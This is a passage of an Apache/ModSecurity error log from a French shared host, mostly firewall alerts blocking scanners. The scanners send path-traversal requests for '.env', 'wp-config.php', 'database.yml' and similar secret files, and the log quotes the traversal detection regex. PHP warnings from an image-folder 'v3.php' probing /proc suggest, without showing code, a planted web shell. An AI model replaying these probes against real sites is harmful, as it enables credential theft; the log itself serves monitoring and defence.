"agKdsRs7kySIUZ3ORnIlVgAAARY"]
[Tue May 12 05:25:37.251508 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdsRs7kySIUZ3ORnIlVgAAARY"]
[Tue May 12 05:25:38.973635 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdsRs7kySIUZ3ORnIlVgAAARY"]
[Tue May 12 05:25:39.000251 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdshs7kySIUZ3ORnIlWAAAARY"]
[Tue May 12 05:25:39.000324 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdshs7kySIUZ3ORnIlWAAAARY"]
[Tue May 12 05:25:39.000492 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env"] [unique_id "agKdshs7kySIUZ3ORnIlWAAAARY"]
[Tue May 12 05:25:40.775391 2026] [security2:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdshs7kySIUZ3ORnIlWAAAARY"]
[Tue May 12 05:25:40.792963 2026] [core:error] [pid 1842385:tid 1842413] [client 45.148.10.238:33382] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 05:25:42.715190 2026] [core:error] [pid 1825287:tid 1825310] [client 45.148.10.238:14562] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 05:25:44.550248 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKduM1tk6y7yBJLpJo5CAAAAIY"]
[Tue May 12 05:25:44.550336 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKduM1tk6y7yBJLpJo5CAAAAIY"]
[Tue May 12 05:25:44.550505 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.local"] [unique_id "agKduM1tk6y7yBJLpJo5CAAAAIY"]
[Tue May 12 05:25:46.266254 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKduM1tk6y7yBJLpJo5CAAAAIY"]
[Tue May 12 05:25:46.283383 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdus1tk6y7yBJLpJo5CQAAAIY"]
[Tue May 12 05:25:46.283454 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdus1tk6y7yBJLpJo5CQAAAIY"]
[Tue May 12 05:25:46.283626 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.production"] [unique_id "agKdus1tk6y7yBJLpJo5CQAAAIY"]
[Tue May 12 05:25:47.980218 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdus1tk6y7yBJLpJo5CQAAAIY"]
[Tue May 12 05:25:47.997311 2026] [access_compat:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] AH01797: client denied by server configuration: /home/letamsga/public_html/wp-config.php
[Tue May 12 05:25:50.769268 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdvs1tk6y7yBJLpJo5DAAAAIY"]
[Tue May 12 05:25:50.769483 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdvs1tk6y7yBJLpJo5DAAAAIY"]
[Tue May 12 05:25:52.521716 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdvs1tk6y7yBJLpJo5DAAAAIY"]
[Tue May 12 05:25:52.538828 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdwM1tk6y7yBJLpJo5DQAAAIY"]
[Tue May 12 05:25:52.539045 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdwM1tk6y7yBJLpJo5DQAAAIY"]
[Tue May 12 05:25:54.245243 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdwM1tk6y7yBJLpJo5DQAAAIY"]
[Tue May 12 05:25:54.262282 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdws1tk6y7yBJLpJo5DgAAAIY"]
[Tue May 12 05:25:54.262486 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdws1tk6y7yBJLpJo5DgAAAIY"]
[Tue May 12 05:25:55.981100 2026] [security2:error] [pid 1820198:tid 1820206] [client 45.148.10.238:41550] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKdws1tk6y7yBJLpJo5DgAAAIY"]
[Tue May 12 05:26:35.294436 2026] [security2:error] [pid 1844863:tid 1844893] [client 43.130.139.177:59202] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agKd6_aAnTZtx1_H_wy2wAAAAVg"]
PHP Warning:  filesize(): stat failed for /proc/79/task/79/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/79/task/79/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/79/task/79/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/79/task/79/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/79/task/79/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/79/task/79/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:26:39.102391 2026] [security2:error] [pid 1808852:tid 1808875] [client 43.130.139.177:60008] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agKd7xfeipD4uoG21FowRAAAABQ"], referer: http://castiglionecf.com
[Tue May 12 05:26:43.009050 2026] [security2:error] [pid 1825287:tid 1825326] [client 43.130.139.177:37458] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agKd8wgpmE1yW0glLdgtqwAAANQ"], referer: https://castiglionecf.com/
[Tue May 12 05:26:48.407347 2026] [security2:error] [pid 1842385:tid 1842394] [client 43.160.225.169:59326] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agKd-Bs7kySIUZ3ORnIlhwAAAQQ"]
[Tue May 12 05:26:52.142051 2026] [security2:error] [pid 1825179:tid 1825219] [client 43.160.225.169:60702] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpc-entreprises.com"] [uri "/"] [unique_id "agKd_Nr1yOh9TvizezieygAAAFU"], referer: http://cpc-entreprises.com
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704817/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704817/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704817/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704817/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704817/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704817/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:26:57.113112 2026] [security2:error] [pid 1842385:tid 1842409] [client 129.226.217.17:49686] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nearoo.fr"] [uri "/"] [unique_id "agKeARs7kySIUZ3ORnIliQAAARI"]
[Tue May 12 05:26:57.370517 2026] [security2:error] [pid 1842385:tid 1842413] [client 51.195.102.189:43062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/api/.env.prod"] [unique_id "agKeARs7kySIUZ3ORnIligAAARY"]
[Tue May 12 05:26:57.370590 2026] [security2:error] [pid 1842385:tid 1842412] [client 51.195.102.189:42856] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "naturedetres.fr"] [uri "/api/.env.local"] [unique_id "agKeARs7kySIUZ3ORnIljAAAARU"]
